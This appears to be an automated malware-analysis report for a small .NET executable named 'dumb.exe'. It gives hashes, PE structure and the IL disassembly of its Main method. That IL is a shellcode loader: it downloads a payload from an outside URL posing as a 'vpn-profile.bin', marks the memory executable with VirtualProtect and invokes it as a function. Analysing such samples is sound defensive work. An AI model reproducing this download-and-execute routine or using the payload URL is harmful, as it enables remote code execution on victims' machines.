Suspicious
Suspect

6587c48966f12eca67de6ab84096888b

PE Executable
|
MD5: 6587c48966f12eca67de6ab84096888b
|
Size: 4.1 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
 Hash Value
MD5
6587c48966f12eca67de6ab84096888b
Sha1
76b8d11e1bb761a6c0e47fea217b14d5d9390e5a
Sha256
cce5527b07713aba842f089543362723d921231af1e28f844ed7dc64a3ea7c50
Sha384
4b09327bda2ef21523ebc6dacaf13ca70c9cbe913596350d41635d7b07acd60a62b6e0c9d2c77d1dfa62adcf42fb0619
Sha512
5c12f414b26e53b704bca6972d61b8fc816ac4102072e9fd91b30215d6ef823468099a39e79bbf75b8c226840c75e1eac2e68fbb23021cdd614a490cab8d9130
SSDeep
48:69/B/oiO706o1/hRHXlX7BI20laT302csjPvDvtEOPulUf0l7WI:iVRP1hRHXvI20laTMstsyf0l
TLSH
3A815403A7E8166AF0EB177409B7470166B5FC149F37DB6F49E80189ACF17244E63B62

PeID

x64 .NET EXE/DLL ( jmp rax - DBG/noDBG ) Visual Studio v.6.0-11.0
File Structure
6587c48966f12eca67de6ab84096888b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

dumb.exe
Full Name

dumb.exe
EntryPoint

System.Void Reflection.Program::Main()
Scope Name

dumb.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

dumb
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

1
Main Method

System.Void Reflection.Program::Main()
Main IL Instruction Count

40
Main IL

ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) newobj System.Void System.Net.WebClient::.ctor() stloc.0 <null> ldloc.0 <null> ldstr https://downloads.beaconvistamedical.com/vpn-profile.bin callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.1 <null> ldloc.1 <null> ldc.i4.3 <null> call System.Runtime.InteropServices.GCHandle System.Runtime.InteropServices.GCHandle::Alloc(System.Object,System.Runtime.InteropServices.GCHandleType) stloc.2 <null> ldloca.s V_2 call System.IntPtr System.Runtime.InteropServices.GCHandle::AddrOfPinnedObject() stloc.3 <null> ldloc.1 <null> ldc.i4.0 <null> ldloc.3 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) ldloc.3 <null> ldloc.1 <null> ldlen <null> conv.i4 <null> conv.i8 <null> call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64) ldc.i4.s 64 ldloca.s V_4 call System.Boolean Reflection.Program::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&) pop <null> ldloc.3 <null> call Reflection.Program/coolio System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer<Reflection.Program/coolio>(System.IntPtr) stloc.s V_5 ldloc.s V_5 callvirt System.Void Reflection.Program/coolio::Invoke() ret <null>
6587c48966f12eca67de6ab84096888b (4.1 KB)
File Structure
6587c48966f12eca67de6ab84096888b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙